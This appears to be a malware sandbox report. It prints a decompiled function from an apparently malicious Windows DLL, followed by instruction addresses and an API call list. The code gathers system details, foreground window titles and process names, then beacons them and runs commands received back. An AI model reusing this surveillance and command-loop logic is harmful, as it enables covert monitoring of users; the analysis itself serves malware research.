					_t260 =  *0x7098f558; // 0x6caf0000
					 *0x7098f3d4 = _v2308;
					 *0x7098f3d8 = _v2316;
					 *0x7098f4ea = 4;
					if(_t260 != 0) {
						_push(0x4b4ca51f);
						_push(1);
						_t440 =  &_v2288;
						_push(_t440);
						_push(_t260);
						_v2288 = 0x1560f705;
						_v2284 = 0;
						_v2280 = 0;
						_v2276 = 0;
						E70981E40();
						_t260 = _v2276;
						_t522 = _t522 + 0x10;
						if(_t260 != 0) {
							_v2340 = 0;
							_t260 =  *_t260(0, 0x65,  &_v2340);
							if(_t260 == 0) {
								_t260 = _v2352;
								if(_t260 != 0) {
									_t260 =  *(_t260 + 0x10) & 0x00001000;
									 *0x7098f4ea = _t440 & 0xffffff00 | _t260 == 0x00001000;
								}
							}
						}
					}
					_push(0x34);
					_push(_t503);
					L7098BF02();
					 *((intOrPtr*)(_t503 + 2)) = 0x832eb9b;
					 *((short*)(_t503 + 6)) = 0x102;
					 *((char*)(_t503 + 8)) = 1;
					_t445 =  *0x7098f594; // 0x43a82b81
					 *((intOrPtr*)(_t503 + 0x18)) = _t445;
					_t537 =  *0x7098f5bc - _t385; // 0x0
					_v2360 = _t385;
					_t261 = _t260 & 0xffffff00 | _t537 != 0x00000000;
					 *(_t503 + 9) = _t261;
					_t392 =  *0x7098f3d4; // 0x0
					 *((intOrPtr*)(_t503 + 0x1c)) = _t392;
					_t446 =  *0x7098f3d8; // 0x0
					 *(_t503 + 0x20) = _t446;
					_t538 =  *0x7098f59c - _t385; // 0x1
					 *((char*)(_t503 + 0xa)) = _t261 & 0xffffff00 | _t538 != 0x00000000;
					 *((short*)(_t503 + 0x12)) =  *0x7098f4ea & 0x000000ff;
					_t447 =  *0x7098f3dc; // 0x0
					 *(_t503 + 0x24) = _t447;
					_t263 =  *0x7098f5f4; // 0x1
					 *((char*)(_t503 + 0xc)) = _t263;
					_t394 =  *0x7098f5f8; // 0x1
					 *((char*)(_t503 + 0xb)) = _t394;
					 *(_t503 + 0xf) = _t385;
					 *((char*)(_t503 + 0x11)) = 0x16;
					_t264 =  *0x7098f5a8; // 0xb76080
					_t490 = E7098A7A0(_t264, 1,  &_v2360);
					_t523 = _t522 + 0xc;
					if(_t490 != _t385) {
						_t47 = _t503 + 0x34; // 0x34
						RtlMoveMemory(_t47, _t490, _v2360);
						HeapFree(GetProcessHeap(), _t385, _t490);
					}
					_t395 =  *0x7098f5b4; // 0xb71e90
					_v2360 = _t385;
					_t491 = E7098A7A0(_t395, 1,  &_v2360);
					_t524 = _t523 + 0xc;
					if(_t491 != _t385) {
						_t53 =  &_a49; // 0x35
						RtlMoveMemory(_t503 + _t53, _t491, _v2360);
						HeapFree(GetProcessHeap(), _t385, _t491);
					}
					_t492 = _v2360 +  &_a50;
					_v2360 = _t385;
					_t508 = E7098A7A0( &_v2156, 1,  &_v2360);
					_t525 = _t524 + 0xc;
					if(_t508 != _t385) {
						RtlMoveMemory(_t492 + _t503, _t508, _v2360);
						HeapFree(GetProcessHeap(), _t385, _t508);
					}
					_v2308 = _t492 + _v2360 + 1;
					_t271 = SetTimer(_t385, _t385, _t385, _t385);
					_t450 =  &_v2220;
					_t493 = _t271;
					_v2340 = 0x28;
					_v2316 = 1;
					_t272 = GetMessageW(_t450, _t385, _t385, _t385);
					if(_t272 == _t385) {
						L94:
						VirtualFree(_t503, _t385, 0x8000);
						goto L95;
					} else {
						L14:
						L14:
						if(_v2316 == _t385) {
							_t398 = _v2220.message;
						} else {
							_t398 = 0x113;
							_v2316 = _t385;
							_v2220.message = 0x113;
							_v2220.hwnd = _t385;
							_v2220.wParam = _t493;
						}
						if(_t272 == 0xffffffff || _t398 == 0x10) {
							goto L93;
						}
						if(_t398 == 0x113) {
							if(_v2220.hwnd != _t385) {
								L91:
								_t450 =  &_v2220;
								DispatchMessageW(_t450);
								_t272 = GetMessageW( &_v2220, _t385, _t385, _t385);
								if(_t272 != _t385) {
									goto L14;
								}
								goto L94;
							}
							L23:
							if(_t547 != 0) {
								goto L91;
							}
							KillTimer(_t385, _t493);
							_push(_t385);
							_push( &_v2280);
							E70986F50();
							_t399 =  *0x7098f588; // 0x79a25c
							_t280 = E709839F0(_t399, _t385, _t385, 1);
							_t281 = _v2312;
							_t494 = _t503 + _t281;
							_push(0x1000 - _t281);
							_push(_t494);
							 *((char*)(_t503 + 0xe)) = _t450 & 0xffffff00 | _t280 != 0x00000000;
							L7098BF02();
							_t452 =  *0x7098f5a8; // 0xb76080
							_t282 =  *0x7098f5b4; // 0xb71e90
							_push(_t452);
							_push(_t282);
							_v2372 = _t385;
							wsprintfW( &_v1624, StrChrW(0x7098ca4c, 0x25));
							_t453 =  *0x7098f580; // 0xb7ea60
							_t527 = _t525 + 0x28;
							if(GetPrivateProfileStringW(StrChrW(0x7098cddc, 0x50),  &_v1616, _t385,  &_v576, 0x103, _t453) != 0) {
								_t514 = E7098A7A0( &_v580, 1,  &_v2372);
								_t527 = _t527 + 0xc;
								if(_t514 != _t385) {
									RtlMoveMemory(_t494, _t514, _v2372);
									HeapFree(GetProcessHeap(), _t385, _t514);
								}
							}
							_t288 = _v2372;
							_v2368 = _t288 + _v2320 + 1;
							 *((intOrPtr*)(_t503 + 0x30)) = _t288;
							_t495 = GetForegroundWindow();
							_v2148 = 0;
							if(_t495 != _t385) {
								GetWindowTextW(_t495,  &_v2148, 0x104);
							}
							_v2372 = _t385;
							_t510 = E7098A7A0( &_v2148, 1,  &_v2372);
							_t528 = _t527 + 0xc;
							if(_t510 != _t385) {
								RtlMoveMemory(_t503 + _v2368, _t510, _v2372);
								HeapFree(GetProcessHeap(), _t385, _t510);
							}
							_t511 = _v2368 + _v2372 + 1;
							_v2148 = 0;
							_v2372 = _t385;
							if(_t495 != _t385) {
								_v2364 = _t385;
								GetWindowThreadProcessId(_t495,  &_v2364);
								_t356 = _v2364;
								if(_t356 > _t385) {
									_v2220.pt = _t356;
									asm("pxor xmm0, xmm0");
									_v2368 = _t385;
									_v2196 = _t385;
									_v2192 = 0x18;
									asm("movq [esp+0xd8], xmm0");
									asm("movq [esp+0xe0], xmm0");
									_v2172 = _t385;
									if(NtOpenProcess( &_v2368, 0x410,  &_v2192,  &(_v2220.pt)) >= 0) {
										_push(0x104);
										_t359 =  &_v2160;
										_push(_t359);
										_push(_t385);
										_push(_v2380);
										L7098BF9E();
										if(_t359 != 0) {
											_t501 = E7098A7A0( &_v2176, 1,  &_v2400);
											_t528 = _t528 + 0xc;
											if(_t501 != _t385) {
												RtlMoveMemory(_t503 + _t511, _t501, _v2400);
												HeapFree(GetProcessHeap(), _t385, _t501);
											}
										}
										NtClose(_v2396);
									}
								}
							}
							_t292 = 0;
							_t496 = _v2372 +  &_v3;
							_v2368 = _t496;
							_v2372 = 0;
							_t559 =  *0x7098f3c8 - _t385; // 0x0
							if(_t559 == 0) {
								L54:
								_t497 = _t496 + _t292 + 1;
								_v2348 = 1;
								if(_t292 > 1) {
									_t348 =  *0x7098f3c8; // 0x0
									_t517 = _t497 + _t503;
									_t292 = GetDlgItemTextA(_t348, 0x4e83, _t517, 0xfff - _t497);
									_v2372 = _t292;
									if(_t292 > _t385 &&  *_t503 == 0x2d) {
										_t292 = 0;
										_v2372 = 0;
										 *_t517 = 0;
										 *((char*)(_t497 + _t503 + 1)) = 0;
									}
								}
								_v2252 = _t385;
								_v2248 = _t385;
								_v2260 = _t385;
								_v2256 = _t385;
								_t498 = _t497 + _t292 + 1;
								_v2352 = _t385;
								 *(_t503 + 0x2c) = _t385;
								 *(_t503 + 0x28) = _t385;
								if(_v2224 != 0x83fe) {
									L61:
									 *((char*)(_t503 + 0xd)) = 0;
									 *(_t503 + 0x14) = _t385;
									goto L62;
								} else {
									_t346 = _v2220.message;
									if(_t346 == _t385) {
										goto L61;
									}
									 *((char*)(_t503 + 0xd)) =  *((intOrPtr*)(_t346 + 0x10));
									 *(_t503 + 0x14) =  *(_t346 + 4);
									_v2252 =  *((intOrPtr*)(_t346 + 0x14));
									_v2248 =  *(_t346 + 0x18);
									_v2352 = _t346;
									 *(_t503 + 0x2c) =  *(_t346 + 0x18);
									L62:
									_push( &_v2364);
									_push( &_v2368);
									_v2368 = _t385;
									_v2364 = _t385;
									_v2356 = E70986B70();
									_v2260 = _v2368;
									_t295 = _v2364;
									_push(1);
									_v2256 = _t295;
									 *(_t503 + 0x28) = _t295;
									 *_t503 = _t498;
									E709857B0(_v2284, _v2288, _t503, _t498);
									_t297 = _v2252;
									_t529 = _t528 + 0x1c;
									_v2268 = _t503;
									_v2264 = _t498;
									if(_v2252 != _t385) {
										_push(1);
										E709857B0(_v2284, _v2288, _t297, _v2248);
										_t529 = _t529 + 0x14;
									}
									_push(0x7098cdd4);
									_push( &_v2288);
									_t298 = E70985A50();
									_push(_t385);
									_t512 = _t298;
									E709857B0(_v2284, _v2288, _t503, _t498);
									_t525 = _t529 + 0x1c;
									if(_v2356 != _t385) {
										VirtualFree(_v2368, _t385, 0x8000);
									}
									_v2356 = _t385;
									if(_t512 <= _t385) {
										L81:
										_push(8);
										_push( &_v2236);
										L7098BF02();
										GetSystemTimeAsFileTime( &_v2244);
										_v2316 = _v2244.dwLowDateTime;
										_v2312 = _v2244.dwHighDateTime;
										_v2368 = _t385;
										RtlTimeToSecondsSince1970( &_v2316,  &_v2368);
										_t463 =  *0x7098f57c; // 0xb7ea60
										_v2356 = 0;
										_t414 =  *0x7098f58c; // 0x7837d8
										_v2360 = 0x640067;
										_t304 = GetPrivateProfileIntW(_t414,  &_v2360, _t385, _t463);
										if(_t304 != _t385) {
											if(_t304 <= _v2376) {
												_push(_t385);
												_push(_t385);
												E70986F50();
												_t525 = _t525 + 8;
											}
										} else {
											_t310 = _v2288;
											_t311 = _t310 & 0x000000ff;
											if(_t310 == 0) {
												_t311 = 1;
											}
											_push(_t311 * 0xe10 + _v2376);
											wsprintfW( &_v1120, StrChrW(0x7098cda0, 0x25));
											_t316 =  *0x7098f57c; // 0xb7ea60
											_t525 = _t525 + 0xc;
											_t317 =  *0x7098f58c; // 0x7837d8
											WritePrivateProfileStringW(_t317,  &_v2356,  &_v1112, _t316);
										}
										goto L87;
									} else {
										if(_t512 < 0x12) {
											L80:
											HeapFree(GetProcessHeap(), _t385, _v2244.dwLowDateTime);
											if(_v2356 != _t385) {
												L87:
												_t305 = _v2368;
												if(_t305 != _t385) {
													_t307 =  *_t305;
													if(_t307 != _t385) {
														SetEvent(_t307);
													}
												}
												_t415 =  *0x7098f000; // 0x3c
												_t493 = SetTimer(_t385, _t385, _t415 * 0x3e8, _t385);
												goto L91;
											}
											goto L81;
										}
										_push(_t385);
										E709857B0(_v2284, _v2288, _v2244.dwLowDateTime, _t512);
										_t499 = _v2244.dwLowDateTime;
										_t525 = _t525 + 0x14;
										if( *_t499 != 0x832eb9b) {
											goto L80;
										}
										_t467 =  *0x7098f57c; // 0xb7ea60
										_v2312 = 0;
										_t421 =  *0x7098f58c; // 0x7837d8
										_v2356 = 1;
										_v2316 = 0x640067;
										WritePrivateProfileStringW(_t421,  &_v2316, _t385, _t467);
										_t325 =  *(_t499 + 4) & 0x0000ffff;
										if(_t325 < 0xa) {
											 *0x7098f000 = 0x3c;
										} else {
											 *0x7098f000 = _t325;
										}
										_t326 =  *(_t499 + 0xc) & 0x0000ffff;
										_v2368 = _t385;
										if(_t326 <= _t385) {
											L77:
											E70986E50(_t385, _t385, _t385, _t385);
											_t525 = _t525 + 0x10;
											goto L78;
										} else {
											_v2364 = _t326 + _v2244.dwLowDateTime + 0x13;
											_t516 = E7098A810(_v2244.dwLowDateTime + 0x12, _t385, _t385);
											_t525 = _t525 + 0xc;
											if(_t516 == _t385) {
												goto L77;
											}
											_t335 = E7098A810(_v2364, _t385, _t385);
											_t525 = _t525 + 0xc;
											_v2364 = _t335;
											if(_t335 != _t385) {
												E70986E50(_t516, _v2364,  *(_t499 + 0xb) & 0x000000ff,  *(_t499 + 0xa) & 0x000000ff);
												_t525 = _t525 + 0x10;
												_v2368 = 1;
												HeapFree(GetProcessHeap(), _t385, _v2364);
											}
											HeapFree(GetProcessHeap(), _t385, _t516);
											if(_v2368 != _t385) {
												L78:
												if( *((intOrPtr*)(_t499 + 0x10)) > _t385) {
													_t329 = HeapAlloc(GetProcessHeap(), 8, 0x1c);
													_v0 =  *((intOrPtr*)(_t499 + 6));
													_t331 = E7098A810(( *(_t499 + 0xc) & 0x0000ffff) + _v2244 + ( *(_t499 + 0xe) & 0x0000ffff) + 0x14, 1, 0);
													_t525 = _t525 + 0xc;
													_a8 = _t331;
													CloseHandle(CreateThread(0, 0, E70985F30, _t329, 0, 0));
													Sleep(0x1f4);
													_t385 = 0;
												}
												goto L80;
											} else {
												goto L77;
											}
										}
									}
								}
							} else {
								_t518 = 0;
								if(_v2348 <= _t385) {
									goto L54;
								}
								_v2352 = 0xfff - _t496;
								_t500 = _t496 + _t503;
								L41:
								L41:
								if(_t518 > 0) {
									Sleep(0x1f4);
								}
								_t351 =  *0x7098f3c8; // 0x0
								_t388 = GetDlgItemTextA(_t351, 0x4e82, _t500, _v2352);
								if( *_t503 == 0x2d || _t388 < 0xb) {
									goto L45;
								}
								_t519 = 0;
								if(_t388 <= 0) {
									L52:
									_t292 = _t388;
									_v2372 = _t292;
									L53:
									_t496 = _v2368;
									_t385 = 0;
									goto L54;
								}
								do {
									if(StrTrimA( &(_t500[_t519]), StrChrA(0x7098cdd8, 0x20)) != 0) {
										_t388 = _t388 - 1;
									}
									_t519 =  &_v3;
								} while (_t519 < _t388);
								goto L52;
								L45:
								_t292 = 0;
								_t518 =  &_v3;
								_v2372 = 0;
								 *_t500 = 0;
								if(_t518 < _v2348) {
									goto L41;
								}
								goto L53;
							}
						}
						_t547 = _t398 - 0x83fe;
						goto L23;
						L93:
						KillTimer(_t385, _t493);
						goto L94;
					}
				}
			}









































































































































                                                                                                        0x70987246
                                                                                                        0x70987250
                                                                                                        0x70987256
                                                                                                        0x70987257
                                                                                                        0x70987268
                                                                                                        0x70987271
                                                                                                        0x70987275
                                                                                                        0x70987cef
                                                                                                        0x70987cf8
                                                                                                        0x7098727b
                                                                                                        0x7098727b
                                                                                                        0x70987284
                                                                                                        0x70987285
                                                                                                        0x7098729b
                                                                                                        0x709872a9
                                                                                                        0x709872af
                                                                                                        0x709872b4
                                                                                                        0x709872b9
                                                                                                        0x709872c2
                                                                                                        0x709872c7
                                                                                                        0x709872cc
                                                                                                        0x709872cd
                                                                                                        0x709872d7
                                                                                                        0x709872db
                                                                                                        0x709872df
                                                                                                        0x709872e3
                                                                                                        0x709872f5
                                                                                                        0x709872fa
                                                                                                        0x709872ff
                                                                                                        0x70987305
                                                                                                        0x7098730b
                                                                                                        0x70987314
                                                                                                        0x70987316
                                                                                                        0x7098731b
                                                                                                        0x7098731d
                                                                                                        0x70987321
                                                                                                        0x70987322
                                                                                                        0x70987323
                                                                                                        0x7098732b
                                                                                                        0x7098732f
                                                                                                        0x70987333
                                                                                                        0x70987337
                                                                                                        0x7098733c
                                                                                                        0x70987340
                                                                                                        0x70987345
                                                                                                        0x7098734f
                                                                                                        0x70987353
                                                                                                        0x70987357
                                                                                                        0x70987359
                                                                                                        0x7098735f
                                                                                                        0x70987364
                                                                                                        0x70987371
                                                                                                        0x70987371
                                                                                                        0x7098735f
                                                                                                        0x70987357
                                                                                                        0x70987345
                                                                                                        0x70987377
                                                                                                        0x70987379
                                                                                                        0x7098737a
                                                                                                        0x7098737f
                                                                                                        0x70987386
                                                                                                        0x7098738c
                                                                                                        0x70987390
                                                                                                        0x70987396
                                                                                                        0x70987399
                                                                                                        0x7098739f
                                                                                                        0x709873a3
                                                                                                        0x709873a6
                                                                                                        0x709873a9
                                                                                                        0x709873af
                                                                                                        0x709873b2
                                                                                                        0x709873b8
                                                                                                        0x709873bb
                                                                                                        0x709873c4
                                                                                                        0x709873ce
                                                                                                        0x709873d2
                                                                                                        0x709873d8
                                                                                                        0x709873db
                                                                                                        0x709873e0
                                                                                                        0x709873e3
                                                                                                        0x709873ee
                                                                                                        0x709873f1
                                                                                                        0x709873f5
                                                                                                        0x709873f9
                                                                                                        0x70987406
                                                                                                        0x70987408
                                                                                                        0x7098740d
                                                                                                        0x70987415
                                                                                                        0x70987419
                                                                                                        0x70987427
                                                                                                        0x70987427
                                                                                                        0x7098742d
                                                                                                        0x7098743f
                                                                                                        0x70987448
                                                                                                        0x7098744a
                                                                                                        0x7098744f
                                                                                                        0x70987457
                                                                                                        0x7098745c
                                                                                                        0x7098746a
                                                                                                        0x7098746a
                                                                                                        0x70987483
                                                                                                        0x70987487
                                                                                                        0x70987490
                                                                                                        0x70987492
                                                                                                        0x70987497
                                                                                                        0x709874a3
                                                                                                        0x709874b1
                                                                                                        0x709874b1
                                                                                                        0x709874c3
                                                                                                        0x709874c7
                                                                                                        0x709874d0
                                                                                                        0x709874d8
                                                                                                        0x709874da
                                                                                                        0x709874e2
                                                                                                        0x709874ea
                                                                                                        0x709874f2
                                                                                                        0x70987ce2
                                                                                                        0x70987ce9
                                                                                                        0x00000000
                                                                                                        0x709874f8
                                                                                                        0x00000000
                                                                                                        0x709874fe
                                                                                                        0x70987502
                                                                                                        0x70987524
                                                                                                        0x70987504
                                                                                                        0x70987504
                                                                                                        0x70987509
                                                                                                        0x7098750d
                                                                                                        0x70987514
                                                                                                        0x7098751b
                                                                                                        0x7098751b
                                                                                                        0x7098752e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987543
                                                                                                        0x70987554
                                                                                                        0x70987cb1
                                                                                                        0x70987cb1
                                                                                                        0x70987cb9
                                                                                                        0x70987cca
                                                                                                        0x70987cd2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987cd8
                                                                                                        0x70987561
                                                                                                        0x70987561
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987569
                                                                                                        0x70987573
                                                                                                        0x70987574
                                                                                                        0x70987575
                                                                                                        0x7098757a
                                                                                                        0x70987585
                                                                                                        0x7098758f
                                                                                                        0x7098759d
                                                                                                        0x709875a0
                                                                                                        0x709875a1
                                                                                                        0x709875a2
                                                                                                        0x709875a5
                                                                                                        0x709875aa
                                                                                                        0x709875b0
                                                                                                        0x709875b5
                                                                                                        0x709875b6
                                                                                                        0x709875be
                                                                                                        0x709875cd
                                                                                                        0x709875d3
                                                                                                        0x709875d9
                                                                                                        0x70987605
                                                                                                        0x7098761b
                                                                                                        0x7098761d
                                                                                                        0x70987622
                                                                                                        0x7098762b
                                                                                                        0x70987639
                                                                                                        0x70987639
                                                                                                        0x70987622
                                                                                                        0x7098763f
                                                                                                        0x7098764b
                                                                                                        0x7098764f
                                                                                                        0x70987658
                                                                                                        0x7098765c
                                                                                                        0x70987666
                                                                                                        0x70987676
                                                                                                        0x70987676
                                                                                                        0x7098768b
                                                                                                        0x70987694
                                                                                                        0x70987696
                                                                                                        0x7098769b
                                                                                                        0x709876aa
                                                                                                        0x709876b8
                                                                                                        0x709876b8
                                                                                                        0x709876c8
                                                                                                        0x709876cc
                                                                                                        0x709876d4
                                                                                                        0x709876da
                                                                                                        0x709876e6
                                                                                                        0x709876ea
                                                                                                        0x709876f0
                                                                                                        0x709876f6
                                                                                                        0x709876fc
                                                                                                        0x7098771c
                                                                                                        0x70987721
                                                                                                        0x70987725
                                                                                                        0x7098772c
                                                                                                        0x70987737
                                                                                                        0x70987740
                                                                                                        0x70987749
                                                                                                        0x70987757
                                                                                                        0x7098775d
                                                                                                        0x70987762
                                                                                                        0x70987769
                                                                                                        0x7098776a
                                                                                                        0x7098776b
                                                                                                        0x7098776c
                                                                                                        0x70987773
                                                                                                        0x70987789
                                                                                                        0x7098778b
                                                                                                        0x70987790
                                                                                                        0x7098779c
                                                                                                        0x709877aa
                                                                                                        0x709877aa
                                                                                                        0x70987790
                                                                                                        0x709877b5
                                                                                                        0x709877b5
                                                                                                        0x70987757
                                                                                                        0x709876f6
                                                                                                        0x709877be
                                                                                                        0x709877c0
                                                                                                        0x709877c4
                                                                                                        0x709877c8
                                                                                                        0x709877cc
                                                                                                        0x709877d2
                                                                                                        0x7098786e
                                                                                                        0x7098786e
                                                                                                        0x70987872
                                                                                                        0x7098787d
                                                                                                        0x7098787f
                                                                                                        0x7098788c
                                                                                                        0x70987896
                                                                                                        0x7098789c
                                                                                                        0x709878a2
                                                                                                        0x709878a9
                                                                                                        0x709878ab
                                                                                                        0x709878af
                                                                                                        0x709878b2
                                                                                                        0x709878b2
                                                                                                        0x709878a2
                                                                                                        0x709878c1
                                                                                                        0x709878c8
                                                                                                        0x709878cf
                                                                                                        0x709878d6
                                                                                                        0x709878dd
                                                                                                        0x709878e1
                                                                                                        0x709878e5
                                                                                                        0x709878e8
                                                                                                        0x709878eb
                                                                                                        0x70987924
                                                                                                        0x70987924
                                                                                                        0x70987928
                                                                                                        0x00000000
                                                                                                        0x709878ed
                                                                                                        0x709878ed
                                                                                                        0x709878f6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709878fb
                                                                                                        0x70987901
                                                                                                        0x70987907
                                                                                                        0x70987911
                                                                                                        0x70987918
                                                                                                        0x7098791f
                                                                                                        0x7098792b
                                                                                                        0x7098792f
                                                                                                        0x70987934
                                                                                                        0x70987935
                                                                                                        0x70987939
                                                                                                        0x70987942
                                                                                                        0x7098794a
                                                                                                        0x70987951
                                                                                                        0x70987955
                                                                                                        0x70987957
                                                                                                        0x7098795f
                                                                                                        0x70987962
                                                                                                        0x70987970
                                                                                                        0x70987975
                                                                                                        0x7098797c
                                                                                                        0x7098797f
                                                                                                        0x70987983
                                                                                                        0x70987989
                                                                                                        0x70987996
                                                                                                        0x709879a0
                                                                                                        0x709879a5
                                                                                                        0x709879a5
                                                                                                        0x709879ac
                                                                                                        0x709879b1
                                                                                                        0x709879b2
                                                                                                        0x709879bb
                                                                                                        0x709879be
                                                                                                        0x709879c6
                                                                                                        0x709879cb
                                                                                                        0x709879d2
                                                                                                        0x709879df
                                                                                                        0x709879df
                                                                                                        0x709879e5
                                                                                                        0x709879eb
                                                                                                        0x70987ba0
                                                                                                        0x70987ba0
                                                                                                        0x70987ba9
                                                                                                        0x70987baa
                                                                                                        0x70987bb7
                                                                                                        0x70987bcf
                                                                                                        0x70987bd9
                                                                                                        0x70987bdd
                                                                                                        0x70987be1
                                                                                                        0x70987be6
                                                                                                        0x70987bf4
                                                                                                        0x70987bf9
                                                                                                        0x70987c01
                                                                                                        0x70987c09
                                                                                                        0x70987c11
                                                                                                        0x70987c72
                                                                                                        0x70987c74
                                                                                                        0x70987c75
                                                                                                        0x70987c76
                                                                                                        0x70987c7b
                                                                                                        0x70987c7b
                                                                                                        0x70987c13
                                                                                                        0x70987c13
                                                                                                        0x70987c19
                                                                                                        0x70987c1c
                                                                                                        0x70987c1e
                                                                                                        0x70987c1e
                                                                                                        0x70987c2d
                                                                                                        0x70987c44
                                                                                                        0x70987c4a
                                                                                                        0x70987c4f
                                                                                                        0x70987c53
                                                                                                        0x70987c66
                                                                                                        0x70987c66
                                                                                                        0x00000000
                                                                                                        0x709879f1
                                                                                                        0x709879f4
                                                                                                        0x70987b80
                                                                                                        0x70987b90
                                                                                                        0x70987b9a
                                                                                                        0x70987c7e
                                                                                                        0x70987c7e
                                                                                                        0x70987c84
                                                                                                        0x70987c86
                                                                                                        0x70987c8a
                                                                                                        0x70987c8d
                                                                                                        0x70987c8d
                                                                                                        0x70987c8a
                                                                                                        0x70987c93
                                                                                                        0x70987caf
                                                                                                        0x00000000
                                                                                                        0x70987caf
                                                                                                        0x00000000
                                                                                                        0x70987b9a
                                                                                                        0x70987a09
                                                                                                        0x70987a0e
                                                                                                        0x70987a13
                                                                                                        0x70987a1a
                                                                                                        0x70987a23
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987a29
                                                                                                        0x70987a37
                                                                                                        0x70987a3c
                                                                                                        0x70987a44
                                                                                                        0x70987a4c
                                                                                                        0x70987a54
                                                                                                        0x70987a5a
                                                                                                        0x70987a61
                                                                                                        0x70987a6d
                                                                                                        0x70987a63
                                                                                                        0x70987a65
                                                                                                        0x70987a65
                                                                                                        0x70987a77
                                                                                                        0x70987a7b
                                                                                                        0x70987a82
                                                                                                        0x70987b0a
                                                                                                        0x70987b0e
                                                                                                        0x70987b13
                                                                                                        0x00000000
                                                                                                        0x70987a88
                                                                                                        0x70987a99
                                                                                                        0x70987aa2
                                                                                                        0x70987aa4
                                                                                                        0x70987aa9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987ab2
                                                                                                        0x70987ab7
                                                                                                        0x70987aba
                                                                                                        0x70987ac0
                                                                                                        0x70987ad2
                                                                                                        0x70987adb
                                                                                                        0x70987ae0
                                                                                                        0x70987aef
                                                                                                        0x70987aef
                                                                                                        0x70987afe
                                                                                                        0x70987b08
                                                                                                        0x70987b16
                                                                                                        0x70987b1a
                                                                                                        0x70987b3a
                                                                                                        0x70987b4a
                                                                                                        0x70987b4d
                                                                                                        0x70987b52
                                                                                                        0x70987b63
                                                                                                        0x70987b6d
                                                                                                        0x70987b78
                                                                                                        0x70987b7e
                                                                                                        0x70987b7e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987b08
                                                                                                        0x70987a82
                                                                                                        0x709879eb
                                                                                                        0x709877d8
                                                                                                        0x709877d8
                                                                                                        0x709877de
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709877eb
                                                                                                        0x709877ef
                                                                                                        0x00000000
                                                                                                        0x709877f1
                                                                                                        0x709877f3
                                                                                                        0x709877fa
                                                                                                        0x709877fa
                                                                                                        0x70987804
                                                                                                        0x7098781a
                                                                                                        0x7098781c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987835
                                                                                                        0x70987839
                                                                                                        0x70987862
                                                                                                        0x70987862
                                                                                                        0x70987864
                                                                                                        0x70987868
                                                                                                        0x70987868
                                                                                                        0x7098786c
                                                                                                        0x00000000
                                                                                                        0x7098786c
                                                                                                        0x70987840
                                                                                                        0x7098785a
                                                                                                        0x7098785c
                                                                                                        0x7098785c
                                                                                                        0x7098785d
                                                                                                        0x7098785e
                                                                                                        0x00000000
                                                                                                        0x70987823
                                                                                                        0x70987823
                                                                                                        0x70987825
                                                                                                        0x70987826
                                                                                                        0x7098782a
                                                                                                        0x70987831
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70987833
                                                                                                        0x709877d2
                                                                                                        0x70987545
                                                                                                        0x00000000
                                                                                                        0x70987cda
                                                                                                        0x70987cdc
                                                                                                        0x00000000
                                                                                                        0x70987cdc
                                                                                                        0x709874f2

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 70987257
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004,?,00000014), ref: 7098726B
                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 70987285
                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000009,?,00000014), ref: 7098729B
                                                                                                        • CharLowerW.USER32(?), ref: 709872A9
                                                                                                        • RtlZeroMemory.NTDLL(7098F3D0,0000011C), ref: 709872B9
                                                                                                        • RtlGetNtVersionNumbers.NTDLL(?,?,?), ref: 709872E3
                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000034), ref: 7098737A
                                                                                                        • RtlMoveMemory.NTDLL(00000034,00000000,?), ref: 70987419
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000034,00000000,?), ref: 70987420
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70987427
                                                                                                        • RtlMoveMemory.NTDLL(00000035,00000000,?), ref: 7098745C
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000035,00000000,?), ref: 70987463
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098746A
                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,?), ref: 709874A3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 709874AA
                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?), ref: 709874B1
                                                                                                          • Part of subcall function 70981E40: lstrlenA.KERNEL32(00000100,00000100,00000000,?,?,?,?,?,70989143), ref: 70981ECE
                                                                                                          • Part of subcall function 70981E40: RtlComputeCrc32.NTDLL ref: 70981ED8
                                                                                                        • SetTimer.USER32(00000000,00000000,00000000,00000000), ref: 709874C7
                                                                                                        • GetMessageW.USER32 ref: 709874EA
                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 70987569
                                                                                                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 709875A5
                                                                                                        • StrChrW.SHLWAPI(7098CA4C,00000025,00B71E90,00B76080,00000000,00001000,?,?,?,00000000,00000000,00000000), ref: 709875C2
                                                                                                        • wsprintfW.USER32 ref: 709875CD
                                                                                                        • StrChrW.SHLWAPI(7098CDDC,00000050,?,00000000,?,00000103,00B7EA60,?,?,?,?,?,?,?,?,00000000), ref: 709875FA
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 709875FD
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 7098762B
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 70987632
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 70987639
                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 70987652
                                                                                                        • GetWindowTextW.USER32 ref: 70987676
